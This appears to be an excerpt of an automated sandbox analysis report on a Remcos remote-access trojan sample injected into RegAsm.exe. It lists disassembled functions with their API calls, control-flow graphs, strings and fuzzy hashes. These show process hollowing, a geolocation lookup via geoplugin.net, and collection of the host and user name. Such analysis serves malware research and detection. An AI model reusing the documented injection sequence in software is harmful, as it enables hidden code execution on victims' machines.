                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                          • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                          • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                          • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                          • ReadProcessMemory.KERNEL32 ref: 004182A6
                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                          • NtClose.NTDLL(?), ref: 00418332
                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                          • WriteProcessMemory.KERNEL32 ref: 00418446
                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                          • ResumeThread.KERNEL32(?), ref: 00418470
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                          • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                          • NtClose.NTDLL(?), ref: 004184A3
                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                          • GetLastError.KERNEL32 ref: 004184B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                          • API String ID: 316982871-3035715614
                                          • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                          • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                          • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                          • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                          Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1624 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1631 10001177-1000119e lstrlenW FindFirstFileW 1624->1631 1632 10001168-10001172 lstrlenW 1624->1632 1633 100011a0-100011a8 1631->1633 1634 100011e1-100011e9 1631->1634 1632->1631 1635 100011c7-100011d8 FindNextFileW 1633->1635 1636 100011aa-100011c4 call 10001000 1633->1636 1635->1633 1638 100011da-100011db FindClose 1635->1638 1636->1635 1638->1634
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                          • lstrcatW.KERNEL32(?,?), ref: 10001151
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                          • FindClose.KERNEL32(00000000), ref: 100011DB
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                          • String ID:
                                          • API String ID: 1083526818-0
                                          • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                          • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                          • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                          • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                          Function 0040F7E2 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                            • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                            • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                          • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                          • ExitProcess.KERNEL32 ref: 0040F905
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                          • String ID: 5.1.1 Pro$`.p$override$pth_unenc
                                          • API String ID: 2281282204-1234790340
                                          • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                          • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                          • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                          • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                          Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1687 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1692 41b456-41b477 InternetReadFile 1687->1692 1693 41b479-41b499 call 4020b7 call 403376 call 401fd8 1692->1693 1694 41b49d-41b4a0 1692->1694 1693->1694 1695 41b4a2-41b4a4 1694->1695 1696 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1694->1696 1695->1692 1695->1696 1700 41b4b8-41b4c2 1696->1700
                                          APIs
                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                          Strings
                                          • http://geoplugin.net/json.gp, xrefs: 0041B448
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseHandleOpen$FileRead
                                          • String ID: http://geoplugin.net/json.gp
                                          • API String ID: 3121278467-91888290
                                          • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                          • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                          • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                          • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                          Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                          • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                            • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                            • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                            • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                          • String ID:
                                          • API String ID: 3950776272-0
                                          • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                          • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                          • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                          • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                          Function 0041B890 Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SystemTimes$Sleep__aulldiv
                                          • String ID:
                                          • API String ID: 188215759-0
                                          • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                          • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                          • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                          • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                          Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,007095D0), ref: 004338DA
                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Crypt$Context$AcquireRandomRelease
                                          • String ID:
                                          • API String ID: 1815803762-0
                                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                          • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                          • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                          Function 0041B69E Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                          • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Name$ComputerUser
                                          • String ID:
                                          • API String ID: 4229901323-0
                                          • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                          • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                          • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                          • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                          Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                          • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                          • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                          • Instruction Fuzzy Hash:
                                          Function 0040EA00 Relevance: 88.3, APIs: 15, Strings: 35, Instructions: 795COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 101 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->101 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 89 40ec47-40ec49 81->89 90 40ec4e-40ec55 81->90 94 40ef2c 89->94 95 40ec57 90->95 96 40ec59-40ec65 call 41b354 90->96 94->49 95->96 103 40ec67-40ec69 96->103 104 40ec6e-40ec72 96->104 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 101->126 103->104 107 40ecb1-40ecc4 call 401e65 call 401fab 104->107 108 40ec74 call 407751 104->108 127 40ecc6 call 407790 107->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->128 117 40ec79-40ec7b 108->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->107 140 40ec9c-40eca2 120->140 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 140->107 143 40eca4-40ecaa 140->143 143->107 147 40ecac call 40729b 143->147 147->107 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 184 40ee4a-40ee54 call 409092 181->184 185 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->185 191 40ee59-40ee7d call 40247c call 434829 184->191 185->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->94 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 357 40f194-40f1a7 call 401e65 call 401fab 347->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 404 40f293-40f29d CreateThread 403->404 405 40f29f-40f2a6 403->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                          APIs
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                            • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                          • String ID: 0op$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-OT0ZCG$Software\$User$`.p$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                          • API String ID: 2830904901-61583073
                                          • Opcode ID: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                          • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                          • Opcode Fuzzy Hash: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                          • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                          Function 00414F65 Relevance: 51.6, APIs: 5, Strings: 24, Instructions: 809sleepnetworkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 613 415220-415246 call 402093 * 2 call 41b580 606->613 614 41524b-415260 call 404f51 call 4048c8 606->614 630 415ade-415af0 call 404e26 call 4021fa 607->630 613->630 629 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 614->629 614->630 694 4153bb-4153c8 call 405aa6 629->694 